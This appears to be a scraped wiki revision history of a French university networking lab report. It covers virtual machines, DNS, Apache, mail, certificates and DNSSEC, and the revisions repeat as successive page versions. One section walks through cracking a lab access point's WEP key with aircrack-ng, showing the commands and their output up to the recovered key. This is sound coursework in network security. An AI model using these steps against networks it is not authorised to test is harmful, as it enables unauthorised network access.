<pre>ifdown<br />
ifup</pre><br />
<br />
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :<br />
<pre> apt-get install vim </pre><br />
<br />
<br />
== Configuration du service internet ==<br />
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP<br />
<br />
=== Installation du serveur HTTP ===<br />
<pre> apt-get install apache2 </pre><br />
=== Installation du serveur DNS ===<br />
<pre> apt-get install bind9 </pre><br />
<br />
Si cette installation vous indique une erreur, il faut modifier le fichier <i>/etc/apt/apt.conf.d/01proxy</i><br />
et remplacer <br />
<pre> Acquire::http::Proxy "http://proxy.polytech-lille.fr:3128"; </pre><br />
par<br />
<pre> Acquire::http::Proxy "http://helfaut.escaut.net:3128"; </pre><br />
Cette modification est du a la modification du proxy de l'école.<br />
<br />
===Configuration de notre nom de domaine===<br />
<br />
Après l'achat de notre nom de domaine <i>orelsan.website</i> sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine<br />
dns.orelsan.webiste -> 193.48.57.181<br />
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.<br />
Puis nous allons modifier 3 fichiers :<br />
<br />
<i>/etc/bind/named.conf.options</i><br />
<pre>options {<br />
allow-transfer { "allowed_to_transfer"; };<br />
};<br />
<br />
acl "allowed_to_transfer" {<br />
217.70.177.40/32 ; //passerelle de gandi par defaut<br />
};</pre><br />
<i>/etc/bind/named.conf.local </i><br />
<pre>//<br />
// Do any local configuration here<br />
//<br />
<br />
// Consider adding the 1918 zones here, if they are not used in your<br />
// organization<br />
//include "/etc/bind/zones.rfc1918";<br />
<br />
zone "orelsan.website" {<br />
type master;<br />
file "/etc/bind/orelsan.website/orelsan";<br />
};<br />
</pre><br />
<i>/etc/bind/orelsan.website/orelsan</i><br />
<pre>$TTL 259200<br />
@ IN SOA dns postmaster.orelsan.website. (<br />
20 ; Version<br />
7200 ; Refresh (2h)<br />
3600 ; Retry (1h)<br />
1209600 ; Expire (14j)<br />
259200 ) ; Minimum TTL (3j)<br />
IN NS dns<br />
IN NS ns6.gandi.net.<br />
IN A 193.48.57.181<br />
IN MX 100 dns<br />
<br />
dns IN A 193.48.57.181<br />
</pre><br />
<br />
Pour prendre en compte les paramètres changés dans les fichiers ci-dessous, il suffit d'effectuer les commandes:<br />
<pre>service bind9 stop<br />
service bind9 start</pre><br />
<br />
Pour observer le bon fonctionnement de notre serveur, on peut visualiser les informations sur<br />
<br />
<i>cat /var/log/daemon.log</i><br />
<br />
Puis un ping de notre page internet peut nous montrer également son bon fonctionnement<br />
Si tout cela fonctionne on peut se rendre sur notre page.<br />
Pour modifier les informations visible sur la page, il suffit d'aller dans <br />
<i>/var/www/html/index.html</i>. Toutes les informations écrites dans ce fichier seront visible sur notre page.<br />
<br />
===Installation boite mail===<br />
<br />
On commence par un installer postfix qui est un serveur de messagerie électronique.<br />
<pre>apt-get install postfix</pre><br />
<br />
Une fois postfix installé, on indique le nom de domaine (orelsan.website) dans la configuration<br />
<br />
Dans <i>/etc/aliases</i> on ajoute:<br />
<pre>admin:root</pre><br />
<br />
Puis on utilise la commande<br />
<pre>newaliases</pre><br />
<br />
On installe également bsd-mailx qui est un agent de courriel utilisateur simple.<br />
<pre>apt-get install bsd-mailx</pre><br />
<br />
Et pour observer nos mail, on tape la commande <i>mail</i> dans la console.<br />
L'adresse mail est admin@orelsan.website.<br />
<br />
===Générer une demande de certificat en SHA 2===<br />
<pre>openssl req -nodes -newkey rsa:2048 -sha256 -keyout monserveur.key -out serveur.csr<br />
<br />
Country Name (2 letter code) [AU]:fr<br />
State or Province Name (full name) [Some-State]:North<br />
Locality Name (eg, city) []:Lille<br />
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech<br />
Organizational Unit Name (eg, section) []:IMA<br />
Common Name (e.g. server FQDN or YOUR name) []:orelsan.website<br />
Email Address []:admin@orelsan.website<br />
<br />
Please enter the following 'extra' attributes<br />
to be sent with your certificate request<br />
A challenge password []:<br />
An optional company name []:<br />
</pre><br />
<br />
Cette fonction nous crée 2 fichiers :<br />
monserveur.key serveur.csr<br />
<br />
-monserveur.key contient la clé privée.<br />
<br />
-serveur.csr contient la clé public.<br />
<br />
On va maintenant ajouter la clé public sur gandi pour qu'il nous génère un certificat.<br />
On crée 2 fichier avec :<br />
<br />
-inter.crt qui contient le certificat intermédiaire.<br />
<br />
-gandi.crt qui qui contient le certificat .<br />
<br />
<pre>root@Orelsan:~# ls<br />
gandi.crt inter.crt mbox monserveur.key serveur.csr</pre><br />
<br />
Dans le fichier <i>/etc/apache2/sites-enabled/000-default.conf</i> on écrit: <br />
<pre><VirtualHost *:443><br />
<br />
ServerName www.orelsan.website<br />
ServerAlias orelsan.website<br />
DocumentRoot /var/www/html<br />
CustomLog /var/log/apache2/secure_access.log combined<br />
<br />
SSLEngine on<br />
SLCertificateFile /root/gandi.crt<br />
SSLCertificateKeyFile /root/monserveur.key<br />
SSLCertificateChainFile /root/inter.crt<br />
SSLVerifyClient None<br />
</VirtualHost></pre><br />
<br />
=== DNSSEC ===<br />
<br />
Dans un premier temps, nous ajoutons l'option ci dessous dans le fichier <i>named.conf.options</i><br />
<pre>dnssec-enable yes </pre><br />
<br />
Dans un répertoire, nous créons d'abord la clé asymétrique de signature puis celle de zone :<br />
<pre>dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE orelsan.website <br />
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE orelsan.website<br />
</pre><br />
<br />
Après avoir renommé les noms de nos clé, nous ajoutons dans notre fichier de zone <br />
<pre>$include /etc/bind/orelsan.website.dnssec/orelsan.website-ksk.key<br />
$include /etc/bind/orelsan.website.dnssec/orelsan.website-zsk.key </pre><br />
<br />
et pour signez les enregistrements de la zone, nous utilisons la commande :<br />
<pre>dnssec-signzone -o orelsan.website -k orelsan.website-ksk ../orelsan.website/orelsan orelsan.website-zsk</pre><br />
<br />
== Cassage clé ==<br />
Pour le crackage de clé, nous allons utiliser le package aircrack-ng qui est un ensemble d'outils permettant de tester la sécurité d'un réseau<br />
=== Cassage de clé WEP ===<br />
Commençons par detecter notre interface wifi par le biais d'un<br />
<pre>ifconfig</pre><br />
ou<br />
<pre>iwconfig</pre><br />
<br />
Notre interface est wlan2 qui correspond à la clé wifi ajoutée sur l'ordinateur.<br />
<br />
Nous pouvons ainsi commencer à utiliser les outils de aircrack en debutant par <br />
<pre>airmon-ng start wlan2 </pre><br />
Cette commande permet de mettre en mode moniteur notre interface wifi<br />
Si tout se passe correctement, vous allez voir apparaitre<br />
<pre>creation du mon0<br />
<br />
Interface Chipset Driver<br />
<br />
mon0 Ralink RT2870/3070 rt2800usb - [phy1]<br />
wlan0 Broadcom wl - [phy0]<br />
wlan2 Ralink RT2870/3070 rt2800usb - [phy1]<br />
(monitor mode enabled on mon1)<br />
</pre><br />
Nous observons bien que le mode moniteur est activé pour notre wlan2.<br />
<br />
Nous pouvons observer tous les réseaux grâce à la commande <br />
<pre>airodump-ng wlan2</pre><br />
<br />
Une fois que nous avons repéré la cracotte que nous voulons cracker on refait un airodump pour se focaliser sur cette cracotte<br />
<pre>airodump-ng wlan2 -c 8 -essid cracotte03 --bssid 04:DA:D2:9C:50:52 -w crack</pre><br />
<br />
-c permet de le selectrionner le channel de communication<br />
-w le nom du fichier dans lequel airodump va enregistrer les données<br />
--bssid permet d'indiquer l'adresse mac de la cible <br />
--essid permet d'indique le ssid de la cible (nom du réseau)<br />
<br />
<pre>CH 8 ][ Elapsed: 1 min ][ 2016-11-21 15:08 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:52 -41 45 799 53316 506 8 54e. WEP WEP cracotte03 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:52 00:0F:B5:92:23:6A -28 54e-54e 222 60221</pre> <br />
<br />
On peut visualiser le nombre de paquets qui transit. <br />
Pour permettre le crackage de la clé WEP, un nombre de data important est necessaire. Pour obtenir plus de data, nous pouvons utiliser la commande aireplay dans un autre terminal.<br />
<pre>root@Piranha:/home/pifou#aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52 wlan2<br />
No source MAC (-h) specified. Using the device MAC (40:A5:EF:05:AA:25)<br />
15:00:01 Waiting for beacon frame (BSSID: 04:DA:D2:9C:50:51) on channel 8<br />
<br />
15:00:01 Sending Authentication Request (Open System)<br />
<br />
15:00:03 Sending Authentication Request (Open System)<br />
<br />
15:00:05 Sending Authentication Request (Open System) [ACK]<br />
15:00:05 Authentication successful<br />
15:00:05 Sending Association Request [ACK]<br />
15:00:05 Association successful :-) (AID: 1) </pre><br />
<br />
Et tout en laissant airodump ouvert sur un terminal, on vient trouver la clé WEP en utilisant la commande ci dessous dans un autre terminal<br />
<pre>root@Piranha:/home/pifou#aircrack-ng crack.cap <br />
Aircrack-ng 1.2 beta3<br />
<br />
<br />
[00:00:39] Tested 257766 keys (got 32866 IVs)<br />
<br />
KB depth byte(vote)<br />
0 0/ 1 EE(46080) B9(39936) 70(39680) B2(39168) 86(38656) 11(38400) B4(38400) F2(38400) A1(38144) 24(37632) <br />
1 0/ 1 EE(45824) 11(44544) 7B(42240) 05(40960) 93(40448) C4(40448) EE(40448) 1C(39168) 3E(39168) 42(38912) <br />
2 0/ 1 EE(45568) 36(42240) 6A(42240) 0D(40192) DC(39680) 98(39424) F3(39424) 39(39168) 3E(38912) B6(38656) <br />
3 0/ 1 EE(48640) 11(43520) 61(40448) E6(40448) 00(38912) 9C(38656) EF(38656) 30(38400) B7(38400) 2A(38144) <br />
4 0/ 1 EE(42240) 77(40960) AA(39936) 86(39424) F2(39168) FE(39168) 95(38912) 69(38656) 73(38656) AF(38656) <br />
5 1/ 2 EE(42752) A2(41728) 34(41216) 46(40448) 0B(39680) 50(39424) 6C(39168) BA(39168) 7D(38912) 66(38656) <br />
6 0/ 1 EE(44032) 8D(43264) 9F(40960) A0(40960) 74(40704) 17(40448) 91(39936) 66(39424) 5A(39168) C4(38912) <br />
7 0/ 1 EE(44032) 36(40192) 4D(39680) 3D(39168) BF(39168) EC(38912) 9D(38656) EF(38656) A9(38400) B4(38144) <br />
8 0/ 1 EE(48128) 35(40448) C1(39680) 9E(39424) F3(39424) C8(39168) 36(38656) 2E(38144) 7A(38144) C5(38144) <br />
9 0/ 1 EE(45312) 74(42496) E7(40960) 6C(40192) 28(39936) 1B(39680) AF(39680) 71(38656) 44(38400) 2C(37888) <br />
10 3/ 1 62(39424) BC(39424) 48(39168) 56(38912) AF(38912) 23(38400) 98(38400) A7(38144) 2B(37888) 79(37888) <br />
11 5/ 1 68(38656) E9(38656) F9(38656) 1E(38400) 36(38400) 5A(38144) 92(38144) 5C(37888) 87(37888) CB(37888) <br />
12 0/ 2 79(40780) 62(40380) 4D(40156) 85(39388) DE(39280) 4E(39060) 98(38876) A7(38544) 6A(38432) 82(38144) <br />
<br />
KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] <br />
Decrypted correctly: 100%</pre><br />
<br />
=== Cassage de clé WPA-PSK ===<br />
Le cassage de clé WPA est légèrement diffèrent de celui WEP. Nous utilisons les mêmes outils (aircrack-ng) mais nous devons fournir un dictionnaire avec tous les mots de passe. Dans notre cas, nous avons décidé de prendre une clé de 8 chiffres. <br />
Nous utilisons pour commencer</div>Jturuthttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&diff=35649TP sysres IMA2a5 2016/2017 G42016-12-06T10:06:53Z<p>Jturut : /* Cassage clé */</p>
<hr />
<div>{| class="wikitable centre" width="100%"<br />
|-<br />
! scope=col | N° VLAN<br />
! scope=col | Prénom<br />
! scope=col | Réseau local<br />
! scope=col | Nom VM<br />
! scope=col | @IP VM <br />
|-<br />
| VLAN20 <br />
| Dimitri <br />
| 10.60.20.0/24<br />
| Vald<br />
|193.48.57.182/28<br />
|-<br />
|VLAN21 <br />
| Nabil <br />
| 10.60.21.0/24<br />
| Pnl<br />
|193.48.57.177/28<br />
|-<br />
| VLAN22<br />
| Otmane <br />
| 10.60.22.0/24<br />
| Lartiste<br />
| 193.48.57.178/28<br />
|-<br />
| VLAN23 <br />
| Hugo <br />
| 10.60.23.0/24 <br />
| Gradur<br />
| 193.48.57.179/28<br />
|-<br />
| VLAN24 <br />
| Clement <br />
| 10.60.24.0/24 <br />
| Gringe<br />
| 193.48.57.180/28<br />
|-<br />
| VLAN25 <br />
| Joan <br />
| 10.60.25.0/24 <br />
| Orelsan<br />
| 193.48.57.181/28<br />
|}<br />
<br />
== Configuration du point d'accés Cisco ==<br />
<br />
== Installation d'une machine virtuelle ==<br />
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.<br />
Pour créer la machine virtuel, on tape la commande suivante :<br />
<pre> xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen</pre><br />
<br />
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier <i>orelsan.cfg</i> en remplaçant la version 3.14 en 3.16.0 <br />
<pre> kernel = '/boot/vmlinuz-3.16.0-4-amd64'<br />
extra = 'elevator=noop'<br />
ramdisk = '/boot/initrd.img-3.16.0-4-amd64'</pre><br />
<br />
Lancement de notre machine virtuelle <br />
<pre> xl create Orelsan.cvg </pre><br />
<br />
Connection à notre machine virtuelle<br />
<pre> xl console Orelsan </pre><br />
<br />
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :<br />
<pre> xl list </pre><br />
<br />
Une fois la connexion sur notre machine établie, nous devons changer le fichier <i>interfaces</i> pour permettre une connexion à internet:<br />
<pre># The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gateway 193.48.57.190</pre><br />
<br />
Puis pour prendre en compte ses modifications nous utilisons :<br />
<pre>ifdown<br />
ifup</pre><br />
<br />
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :<br />
<pre> apt-get install vim </pre><br />
<br />
<br />
== Configuration du service internet ==<br />
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP<br />
<br />
=== Installation du serveur HTTP ===<br />
<pre> apt-get install apache2 </pre><br />
=== Installation du serveur DNS ===<br />
<pre> apt-get install bind9 </pre><br />
<br />
Si cette installation vous indique une erreur, il faut modifier le fichier <i>/etc/apt/apt.conf.d/01proxy</i><br />
et remplacer <br />
<pre> Acquire::http::Proxy "http://proxy.polytech-lille.fr:3128"; </pre><br />
par<br />
<pre> Acquire::http::Proxy "http://helfaut.escaut.net:3128"; </pre><br />
Cette modification est du a la modification du proxy de l'école.<br />
<br />
===Configuration de notre nom de domaine===<br />
<br />
Après l'achat de notre nom de domaine <i>orelsan.website</i> sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine<br />
dns.orelsan.webiste -> 193.48.57.181<br />
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.<br />
Puis nous allons modifier 3 fichiers :<br />
<br />
<i>/etc/bind/named.conf.options</i><br />
<pre>options {<br />
allow-transfer { "allowed_to_transfer"; };<br />
};<br />
<br />
acl "allowed_to_transfer" {<br />
217.70.177.40/32 ; //passerelle de gandi par defaut<br />
};</pre><br />
<i>/etc/bind/named.conf.local </i><br />
<pre>//<br />
// Do any local configuration here<br />
//<br />
<br />
// Consider adding the 1918 zones here, if they are not used in your<br />
// organization<br />
//include "/etc/bind/zones.rfc1918";<br />
<br />
zone "orelsan.website" {<br />
type master;<br />
file "/etc/bind/orelsan.website/orelsan";<br />
};<br />
</pre><br />
<i>/etc/bind/orelsan.website/orelsan</i><br />
<pre>$TTL 259200<br />
@ IN SOA dns postmaster.orelsan.website. (<br />
20 ; Version<br />
7200 ; Refresh (2h)<br />
3600 ; Retry (1h)<br />
1209600 ; Expire (14j)<br />
259200 ) ; Minimum TTL (3j)<br />
IN NS dns<br />
IN NS ns6.gandi.net.<br />
IN A 193.48.57.181<br />
IN MX 100 dns<br />
<br />
dns IN A 193.48.57.181<br />
</pre><br />
<br />
Pour prendre en compte les paramètres changés dans les fichiers ci-dessous, il suffit d'effectuer les commandes:<br />
<pre>service bind9 stop<br />
service bind9 start</pre><br />
<br />
Pour observer le bon fonctionnement de notre serveur, on peut visualiser les informations sur<br />
<br />
<i>cat /var/log/daemon.log</i><br />
<br />
Puis un ping de notre page internet peut nous montrer également son bon fonctionnement<br />
Si tout cela fonctionne on peut se rendre sur notre page.<br />
Pour modifier les informations visible sur la page, il suffit d'aller dans <br />
<i>/var/www/html/index.html</i>. Toutes les informations écrites dans ce fichier seront visible sur notre page.<br />
<br />
===Installation boite mail===<br />
<br />
On commence par un installer postfix qui est un serveur de messagerie électronique.<br />
<pre>apt-get install postfix</pre><br />
<br />
Une fois postfix installé, on indique le nom de domaine (orelsan.website) dans la configuration<br />
<br />
Dans <i>/etc/aliases</i> on ajoute:<br />
<pre>admin:root</pre><br />
<br />
Puis on utilise la commande<br />
<pre>newaliases</pre><br />
<br />
On installe également bsd-mailx qui est un agent de courriel utilisateur simple.<br />
<pre>apt-get install bsd-mailx</pre><br />
<br />
Et pour observer nos mail, on tape la commande <i>mail</i> dans la console.<br />
L'adresse mail est admin@orelsan.website.<br />
<br />
===Générer une demande de certificat en SHA 2===<br />
<pre>openssl req -nodes -newkey rsa:2048 -sha256 -keyout monserveur.key -out serveur.csr<br />
<br />
Country Name (2 letter code) [AU]:fr<br />
State or Province Name (full name) [Some-State]:North<br />
Locality Name (eg, city) []:Lille<br />
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech<br />
Organizational Unit Name (eg, section) []:IMA<br />
Common Name (e.g. server FQDN or YOUR name) []:orelsan.website<br />
Email Address []:admin@orelsan.website<br />
<br />
Please enter the following 'extra' attributes<br />
to be sent with your certificate request<br />
A challenge password []:<br />
An optional company name []:<br />
</pre><br />
<br />
Cette fonction nous crée 2 fichiers :<br />
monserveur.key serveur.csr<br />
<br />
-monserveur.key contient la clé privée.<br />
<br />
-serveur.csr contient la clé public.<br />
<br />
On va maintenant ajouter la clé public sur gandi pour qu'il nous génère un certificat.<br />
On crée 2 fichier avec :<br />
<br />
-inter.crt qui contient le certificat intermédiaire.<br />
<br />
-gandi.crt qui qui contient le certificat .<br />
<br />
<pre>root@Orelsan:~# ls<br />
gandi.crt inter.crt mbox monserveur.key serveur.csr</pre><br />
<br />
Dans le fichier <i>/etc/apache2/sites-enabled/000-default.conf</i> on écrit: <br />
<pre><VirtualHost *:443><br />
<br />
ServerName www.orelsan.website<br />
ServerAlias orelsan.website<br />
DocumentRoot /var/www/html<br />
CustomLog /var/log/apache2/secure_access.log combined<br />
<br />
SSLEngine on<br />
SLCertificateFile /root/gandi.crt<br />
SSLCertificateKeyFile /root/monserveur.key<br />
SSLCertificateChainFile /root/inter.crt<br />
SSLVerifyClient None<br />
</VirtualHost></pre><br />
<br />
=== DNSSEC ===<br />
<br />
Dans un premier temps, nous ajoutons l'option ci dessous dans le fichier <i>named.conf.options</i><br />
<pre>dnssec-enable yes </pre><br />
<br />
Dans un répertoire, nous créons d'abord la clé asymétrique de signature puis celle de zone :<br />
<pre>dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE orelsan.website <br />
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE orelsan.website<br />
</pre><br />
<br />
Après avoir renommé les noms de nos clé, nous ajoutons dans notre fichier de zone <br />
<pre>$include /etc/bind/orelsan.website.dnssec/orelsan.website-ksk.key<br />
$include /etc/bind/orelsan.website.dnssec/orelsan.website-zsk.key </pre><br />
<br />
et pour signez les enregistrements de la zone, nous utilisons la commande :<br />
<pre>dnssec-signzone -o orelsan.website -k orelsan.website-ksk ../orelsan.website/orelsan orelsan.website-zsk</pre><br />
<br />
== Cassage clé ==<br />
Pour le crackage de clé, nous allons utiliser le package aircrack-ng qui est un ensemble d'outils permettant de tester la sécurité d'un réseau<br />
=== Cassage de clé WEP ===<br />
Commençons par detecter notre interface wifi par le biais d'un<br />
<pre>ifconfig</pre><br />
ou<br />
<pre>iwconfig</pre><br />
<br />
Notre interface est wlan2 qui correspond à la clé wifi ajoutée sur l'ordinateur.<br />
<br />
Nous pouvons ainsi commencer à utiliser les outils de aircrack en debutant par <br />
<pre>airmon-ng start wlan2 </pre><br />
Cette commande permet de mettre en mode moniteur notre interface wifi<br />
Si tout se passe correctement, vous allez voir apparaitre<br />
<pre>creation du mon0<br />
<br />
Interface Chipset Driver<br />
<br />
mon0 Ralink RT2870/3070 rt2800usb - [phy1]<br />
wlan0 Broadcom wl - [phy0]<br />
wlan2 Ralink RT2870/3070 rt2800usb - [phy1]<br />
(monitor mode enabled on mon1)<br />
</pre><br />
Nous observons bien que le mode moniteur est activé pour notre wlan2.<br />
<br />
Nous pouvons observer tous les réseaux grâce à la commande <br />
<pre>airodump-ng wlan2</pre><br />
<br />
Une fois que nous avons repéré la cracotte que nous voulons cracker on refait un airodump pour se focaliser sur cette cracotte<br />
<pre>airodump-ng wlan2 -c 8 -essid cracotte03 --bssid 04:DA:D2:9C:50:52 -w crack</pre><br />
<br />
-c permet de le selectrionner le channel de communication<br />
-w le nom du fichier dans lequel airodump va enregistrer les données<br />
--bssid permet d'indiquer l'adresse mac de la cible <br />
--essid permet d'indique le ssid de la cible (nom du réseau)<br />
<br />
<pre>CH 8 ][ Elapsed: 1 min ][ 2016-11-21 15:08 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:52 -41 45 799 53316 506 8 54e. WEP WEP cracotte03 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:52 00:0F:B5:92:23:6A -28 54e-54e 222 60221</pre> <br />
<br />
On peut visualiser le nombre de paquets qui transit. <br />
Pour permettre le crackage de la clé WEP, un nombre de data important est necessaire. Pour obtenir plus de data, nous pouvons utiliser la commande aireplay dans un autre terminal.<br />
<pre>root@Piranha:/home/pifou#aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52 wlan2<br />
No source MAC (-h) specified. Using the device MAC (40:A5:EF:05:AA:25)<br />
15:00:01 Waiting for beacon frame (BSSID: 04:DA:D2:9C:50:51) on channel 8<br />
<br />
15:00:01 Sending Authentication Request (Open System)<br />
<br />
15:00:03 Sending Authentication Request (Open System)<br />
<br />
15:00:05 Sending Authentication Request (Open System) [ACK]<br />
15:00:05 Authentication successful<br />
15:00:05 Sending Association Request [ACK]<br />
15:00:05 Association successful :-) (AID: 1) </pre><br />
<br />
Et tout en laissant airodump ouvert sur un terminal, on vient trouver la clé WEP en utilisant la commande ci dessous dans un autre terminal<br />
<pre>root@Piranha:/home/pifou#aircrack-ng crack.cap <br />
Aircrack-ng 1.2 beta3<br />
<br />
<br />
[00:00:39] Tested 257766 keys (got 32866 IVs)<br />
<br />
KB depth byte(vote)<br />
0 0/ 1 EE(46080) B9(39936) 70(39680) B2(39168) 86(38656) 11(38400) B4(38400) F2(38400) A1(38144) 24(37632) <br />
1 0/ 1 EE(45824) 11(44544) 7B(42240) 05(40960) 93(40448) C4(40448) EE(40448) 1C(39168) 3E(39168) 42(38912) <br />
2 0/ 1 EE(45568) 36(42240) 6A(42240) 0D(40192) DC(39680) 98(39424) F3(39424) 39(39168) 3E(38912) B6(38656) <br />
3 0/ 1 EE(48640) 11(43520) 61(40448) E6(40448) 00(38912) 9C(38656) EF(38656) 30(38400) B7(38400) 2A(38144) <br />
4 0/ 1 EE(42240) 77(40960) AA(39936) 86(39424) F2(39168) FE(39168) 95(38912) 69(38656) 73(38656) AF(38656) <br />
5 1/ 2 EE(42752) A2(41728) 34(41216) 46(40448) 0B(39680) 50(39424) 6C(39168) BA(39168) 7D(38912) 66(38656) <br />
6 0/ 1 EE(44032) 8D(43264) 9F(40960) A0(40960) 74(40704) 17(40448) 91(39936) 66(39424) 5A(39168) C4(38912) <br />
7 0/ 1 EE(44032) 36(40192) 4D(39680) 3D(39168) BF(39168) EC(38912) 9D(38656) EF(38656) A9(38400) B4(38144) <br />
8 0/ 1 EE(48128) 35(40448) C1(39680) 9E(39424) F3(39424) C8(39168) 36(38656) 2E(38144) 7A(38144) C5(38144) <br />
9 0/ 1 EE(45312) 74(42496) E7(40960) 6C(40192) 28(39936) 1B(39680) AF(39680) 71(38656) 44(38400) 2C(37888) <br />
10 3/ 1 62(39424) BC(39424) 48(39168) 56(38912) AF(38912) 23(38400) 98(38400) A7(38144) 2B(37888) 79(37888) <br />
11 5/ 1 68(38656) E9(38656) F9(38656) 1E(38400) 36(38400) 5A(38144) 92(38144) 5C(37888) 87(37888) CB(37888) <br />
12 0/ 2 79(40780) 62(40380) 4D(40156) 85(39388) DE(39280) 4E(39060) 98(38876) A7(38544) 6A(38432) 82(38144) <br />
<br />
KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] <br />
Decrypted correctly: 100%</pre><br />
<br />
=== Cassage de clé WPA-PSK ===</div>Jturuthttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&diff=35648TP sysres IMA2a5 2016/2017 G42016-12-06T10:05:22Z<p>Jturut : /* Cassage clé */</p>
<hr />
<div>{| class="wikitable centre" width="100%"<br />
|-<br />
! scope=col | N° VLAN<br />
! scope=col | Prénom<br />
! scope=col | Réseau local<br />
! scope=col | Nom VM<br />
! scope=col | @IP VM <br />
|-<br />
| VLAN20 <br />
| Dimitri <br />
| 10.60.20.0/24<br />
| Vald<br />
|193.48.57.182/28<br />
|-<br />
|VLAN21 <br />
| Nabil <br />
| 10.60.21.0/24<br />
| Pnl<br />
|193.48.57.177/28<br />
|-<br />
| VLAN22<br />
| Otmane <br />
| 10.60.22.0/24<br />
| Lartiste<br />
| 193.48.57.178/28<br />
|-<br />
| VLAN23 <br />
| Hugo <br />
| 10.60.23.0/24 <br />
| Gradur<br />
| 193.48.57.179/28<br />
|-<br />
| VLAN24 <br />
| Clement <br />
| 10.60.24.0/24 <br />
| Gringe<br />
| 193.48.57.180/28<br />
|-<br />
| VLAN25 <br />
| Joan <br />
| 10.60.25.0/24 <br />
| Orelsan<br />
| 193.48.57.181/28<br />
|}<br />
<br />
== Configuration du point d'accés Cisco ==<br />
<br />
== Installation d'une machine virtuelle ==<br />
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.<br />
Pour créer la machine virtuel, on tape la commande suivante :<br />
<pre> xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen</pre><br />
<br />
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier <i>orelsan.cfg</i> en remplaçant la version 3.14 en 3.16.0 <br />
<pre> kernel = '/boot/vmlinuz-3.16.0-4-amd64'<br />
extra = 'elevator=noop'<br />
ramdisk = '/boot/initrd.img-3.16.0-4-amd64'</pre><br />
<br />
Lancement de notre machine virtuelle <br />
<pre> xl create Orelsan.cvg </pre><br />
<br />
Connection à notre machine virtuelle<br />
<pre> xl console Orelsan </pre><br />
<br />
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :<br />
<pre> xl list </pre><br />
<br />
Une fois la connexion sur notre machine établie, nous devons changer le fichier <i>interfaces</i> pour permettre une connexion à internet:<br />
<pre># The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gateway 193.48.57.190</pre><br />
<br />
Puis pour prendre en compte ses modifications nous utilisons :<br />
<pre>ifdown<br />
ifup</pre><br />
<br />
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :<br />
<pre> apt-get install vim </pre><br />
<br />
<br />
== Configuration du service internet ==<br />
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP<br />
<br />
=== Installation du serveur HTTP ===<br />
<pre> apt-get install apache2 </pre><br />
=== Installation du serveur DNS ===<br />
<pre> apt-get install bind9 </pre><br />
<br />
Si cette installation vous indique une erreur, il faut modifier le fichier <i>/etc/apt/apt.conf.d/01proxy</i><br />
et remplacer <br />
<pre> Acquire::http::Proxy "http://proxy.polytech-lille.fr:3128"; </pre><br />
par<br />
<pre> Acquire::http::Proxy "http://helfaut.escaut.net:3128"; </pre><br />
Cette modification est du a la modification du proxy de l'école.<br />
<br />
===Configuration de notre nom de domaine===<br />
<br />
Après l'achat de notre nom de domaine <i>orelsan.website</i> sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine<br />
dns.orelsan.webiste -> 193.48.57.181<br />
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.<br />
Puis nous allons modifier 3 fichiers :<br />
<br />
<i>/etc/bind/named.conf.options</i><br />
